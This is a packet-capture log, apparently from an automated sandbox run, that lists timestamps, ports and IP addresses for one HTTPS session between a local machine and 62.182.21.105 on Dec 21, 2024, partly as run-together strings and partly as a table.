                                                                                                                                                                                                                                              Dec 21, 2024 14:59:14.209518909 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:14.209542990 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:14.242929935 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:14.243012905 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:14.243043900 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:14.243103981 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:14.243138075 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:14.243160009 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:14.249110937 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:14.249138117 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:14.249226093 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:14.249243021 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:14.249295950 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:14.258347034 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:14.258374929 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:14.258460999 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:14.258506060 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:14.258534908 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:14.258586884 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:14.264555931 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:14.264570951 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:14.264638901 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:14.264663935 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:14.264708996 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:14.270680904 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:14.270697117 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:14.270788908 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:14.270833015 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:14.270888090 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:14.276360989 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:14.276376963 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:14.276465893 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:14.276482105 CET4434971062.182.21.105192.168.2.5
Timestamp                              Source Port  Dest Port  Source IP       Dest IP
Dec 21, 2024 14:59:14.276531935 CET    49710        443        192.168.2.5     62.182.21.105
Dec 21, 2024 14:59:14.328356028 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.328377008 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.328444958 CET    49710        443        192.168.2.5     62.182.21.105
Dec 21, 2024 14:59:14.328445911 CET    49710        443        192.168.2.5     62.182.21.105
Dec 21, 2024 14:59:14.328511000 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.328558922 CET    49710        443        192.168.2.5     62.182.21.105
Dec 21, 2024 14:59:14.333498001 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.333515882 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.333581924 CET    49710        443        192.168.2.5     62.182.21.105
Dec 21, 2024 14:59:14.333597898 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.333647966 CET    49710        443        192.168.2.5     62.182.21.105
Dec 21, 2024 14:59:14.435488939 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.435513973 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.435570955 CET    49710        443        192.168.2.5     62.182.21.105
Dec 21, 2024 14:59:14.435601950 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.435616970 CET    49710        443        192.168.2.5     62.182.21.105
Dec 21, 2024 14:59:14.435637951 CET    49710        443        192.168.2.5     62.182.21.105
Dec 21, 2024 14:59:14.441232920 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.441246986 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.441313982 CET    49710        443        192.168.2.5     62.182.21.105
Dec 21, 2024 14:59:14.441340923 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.441379070 CET    49710        443        192.168.2.5     62.182.21.105
Dec 21, 2024 14:59:14.450805902 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.450819016 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.450895071 CET    49710        443        192.168.2.5     62.182.21.105
Dec 21, 2024 14:59:14.450913906 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.450969934 CET    49710        443        192.168.2.5     62.182.21.105
Dec 21, 2024 14:59:14.456774950 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.456790924 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.456845045 CET    49710        443        192.168.2.5     62.182.21.105
Dec 21, 2024 14:59:14.456861019 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.456893921 CET    49710        443        192.168.2.5     62.182.21.105
Dec 21, 2024 14:59:14.456981897 CET    49710        443        192.168.2.5     62.182.21.105
Dec 21, 2024 14:59:14.462640047 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.462654114 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.462707996 CET    49710        443        192.168.2.5     62.182.21.105
Dec 21, 2024 14:59:14.462723017 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.462750912 CET    49710        443        192.168.2.5     62.182.21.105
Dec 21, 2024 14:59:14.462780952 CET    49710        443        192.168.2.5     62.182.21.105
Dec 21, 2024 14:59:14.469202995 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.469217062 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.469278097 CET    49710        443        192.168.2.5     62.182.21.105
Dec 21, 2024 14:59:14.469294071 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.469345093 CET    49710        443        192.168.2.5     62.182.21.105
Dec 21, 2024 14:59:14.521054983 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.521081924 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.521141052 CET    49710        443        192.168.2.5     62.182.21.105
Dec 21, 2024 14:59:14.521173000 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.521208048 CET    49710        443        192.168.2.5     62.182.21.105
Dec 21, 2024 14:59:14.521229029 CET    49710        443        192.168.2.5     62.182.21.105
Dec 21, 2024 14:59:14.526459932 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.526478052 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.526532888 CET    49710        443        192.168.2.5     62.182.21.105
Dec 21, 2024 14:59:14.526546001 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.526596069 CET    49710        443        192.168.2.5     62.182.21.105
Dec 21, 2024 14:59:14.627017021 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.627046108 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.627202034 CET    49710        443        192.168.2.5     62.182.21.105
Dec 21, 2024 14:59:14.627223015 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.627278090 CET    49710        443        192.168.2.5     62.182.21.105
Dec 21, 2024 14:59:14.633193016 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.633209944 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.633289099 CET    49710        443        192.168.2.5     62.182.21.105
Dec 21, 2024 14:59:14.633301973 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.633352041 CET    49710        443        192.168.2.5     62.182.21.105
Dec 21, 2024 14:59:14.643076897 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.643093109 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.643168926 CET    49710        443        192.168.2.5     62.182.21.105
Dec 21, 2024 14:59:14.643187046 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.643237114 CET    49710        443        192.168.2.5     62.182.21.105
Dec 21, 2024 14:59:14.648521900 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.648539066 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.648634911 CET    49710        443        192.168.2.5     62.182.21.105
Dec 21, 2024 14:59:14.648648024 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.648703098 CET    49710        443        192.168.2.5     62.182.21.105
Dec 21, 2024 14:59:14.654997110 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.655013084 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.655097961 CET    49710        443        192.168.2.5     62.182.21.105
Dec 21, 2024 14:59:14.655111074 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.655163050 CET    49710        443        192.168.2.5     62.182.21.105
Dec 21, 2024 14:59:14.660753965 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.660768032 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.660849094 CET    49710        443        192.168.2.5     62.182.21.105
Dec 21, 2024 14:59:14.660861015 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.660912037 CET    49710        443        192.168.2.5     62.182.21.105
Dec 21, 2024 14:59:14.712922096 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.712954998 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.713007927 CET    49710        443        192.168.2.5     62.182.21.105
Dec 21, 2024 14:59:14.713056087 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.713092089 CET    49710        443        192.168.2.5     62.182.21.105
Dec 21, 2024 14:59:14.713116884 CET    49710        443        192.168.2.5     62.182.21.105
Dec 21, 2024 14:59:14.718250990 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.718269110 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.718350887 CET    49710        443        192.168.2.5     62.182.21.105
Dec 21, 2024 14:59:14.718396902 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.718446970 CET    49710        443        192.168.2.5     62.182.21.105
Dec 21, 2024 14:59:14.819931030 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.819958925 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.820039034 CET    49710        443        192.168.2.5     62.182.21.105
Dec 21, 2024 14:59:14.820111990 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.820148945 CET    49710        443        192.168.2.5     62.182.21.105
Dec 21, 2024 14:59:14.820172071 CET    49710        443        192.168.2.5     62.182.21.105
Dec 21, 2024 14:59:14.825342894 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.825361013 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.825426102 CET    49710        443        192.168.2.5     62.182.21.105
Dec 21, 2024 14:59:14.825440884 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.825490952 CET    49710        443        192.168.2.5     62.182.21.105
Dec 21, 2024 14:59:14.835444927 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.835459948 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.835521936 CET    49710        443        192.168.2.5     62.182.21.105
Dec 21, 2024 14:59:14.835535049 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.835606098 CET    49710        443        192.168.2.5     62.182.21.105
Dec 21, 2024 14:59:14.842209101 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.842222929 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.842281103 CET    49710        443        192.168.2.5     62.182.21.105
Dec 21, 2024 14:59:14.842293978 CET    443          49710      62.182.21.105   192.168.2.5
Dec 21, 2024 14:59:14.842348099 CET    49710        443        192.168.2.5     62.182.21.105
Dec 21, 2024 14:59:14.847623110 CET    443          49710      62.182.21.105   192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:14.847640038 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:14.847703934 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:14.847721100 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:14.847771883 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:14.853741884 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:14.853758097 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:14.853827000 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:14.853840113 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:14.853888988 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:14.904805899 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:14.904835939 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:14.904932022 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:14.904949903 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:14.904987097 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:14.905029058 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:14.910984039 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:14.910999060 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:14.911056995 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:14.911072016 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:14.911124945 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.012054920 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.012079000 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.012137890 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.012156963 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.012183905 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.012204885 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.017743111 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.017791986 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.017823935 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.017838001 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.017863989 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.017884016 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.027734041 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.027754068 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.027818918 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.027833939 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.027889013 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.033675909 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.033691883 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.033751965 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.033763885 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.033802032 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.033822060 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.039868116 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.039882898 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.039948940 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.039972067 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.040049076 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.045217991 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.045233011 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.045289993 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.045304060 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.045352936 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.097110033 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.097131014 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.097207069 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.097235918 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.097265959 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.097285032 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.103213072 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.103230000 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.103301048 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.103329897 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.103378057 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.204109907 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.204133034 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.204186916 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.204207897 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.204231977 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.204247952 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.209878922 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.209897995 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.209939003 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.209949017 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.209980965 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.220222950 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.220257998 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.220284939 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.220293999 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.220326900 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.225681067 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.225702047 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.225753069 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.225760937 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.225807905 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.233194113 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.233213902 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.233257055 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.233269930 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.233302116 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.233319044 CET49710443192.168.2.562.182.21.105
Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Dec 21, 2024 14:59:15.238666058 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.238687992 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.238725901 CET  49710        443        192.168.2.5    62.182.21.105
Dec 21, 2024 14:59:15.238739967 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.238765001 CET  49710        443        192.168.2.5    62.182.21.105
Dec 21, 2024 14:59:15.238784075 CET  49710        443        192.168.2.5    62.182.21.105
Dec 21, 2024 14:59:15.289514065 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.289535999 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.289577007 CET  49710        443        192.168.2.5    62.182.21.105
Dec 21, 2024 14:59:15.289596081 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.289618015 CET  49710        443        192.168.2.5    62.182.21.105
Dec 21, 2024 14:59:15.289633989 CET  49710        443        192.168.2.5    62.182.21.105
Dec 21, 2024 14:59:15.295794964 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.295814991 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.295862913 CET  49710        443        192.168.2.5    62.182.21.105
Dec 21, 2024 14:59:15.295871973 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.295914888 CET  49710        443        192.168.2.5    62.182.21.105
Dec 21, 2024 14:59:15.396703005 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.396730900 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.396821022 CET  49710        443        192.168.2.5    62.182.21.105
Dec 21, 2024 14:59:15.396888971 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.396953106 CET  49710        443        192.168.2.5    62.182.21.105
Dec 21, 2024 14:59:15.402858973 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.402874947 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.402981997 CET  49710        443        192.168.2.5    62.182.21.105
Dec 21, 2024 14:59:15.402996063 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.403048038 CET  49710        443        192.168.2.5    62.182.21.105
Dec 21, 2024 14:59:15.412287951 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.412302971 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.412395000 CET  49710        443        192.168.2.5    62.182.21.105
Dec 21, 2024 14:59:15.412409067 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.412458897 CET  49710        443        192.168.2.5    62.182.21.105
Dec 21, 2024 14:59:15.417593002 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.417609930 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.417691946 CET  49710        443        192.168.2.5    62.182.21.105
Dec 21, 2024 14:59:15.417705059 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.417753935 CET  49710        443        192.168.2.5    62.182.21.105
Dec 21, 2024 14:59:15.423751116 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.423767090 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.423840046 CET  49710        443        192.168.2.5    62.182.21.105
Dec 21, 2024 14:59:15.423854113 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.423994064 CET  49710        443        192.168.2.5    62.182.21.105
Dec 21, 2024 14:59:15.429876089 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.429908037 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.429963112 CET  49710        443        192.168.2.5    62.182.21.105
Dec 21, 2024 14:59:15.429977894 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.430015087 CET  49710        443        192.168.2.5    62.182.21.105
Dec 21, 2024 14:59:15.430051088 CET  49710        443        192.168.2.5    62.182.21.105
Dec 21, 2024 14:59:15.481489897 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.481507063 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.481616974 CET  49710        443        192.168.2.5    62.182.21.105
Dec 21, 2024 14:59:15.481640100 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.481702089 CET  49710        443        192.168.2.5    62.182.21.105
Dec 21, 2024 14:59:15.487577915 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.487593889 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.487688065 CET  49710        443        192.168.2.5    62.182.21.105
Dec 21, 2024 14:59:15.487701893 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.487763882 CET  49710        443        192.168.2.5    62.182.21.105
Dec 21, 2024 14:59:15.587903023 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.587928057 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.587991953 CET  49710        443        192.168.2.5    62.182.21.105
Dec 21, 2024 14:59:15.588010073 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.588062048 CET  49710        443        192.168.2.5    62.182.21.105
Dec 21, 2024 14:59:15.594453096 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.594470978 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.594523907 CET  49710        443        192.168.2.5    62.182.21.105
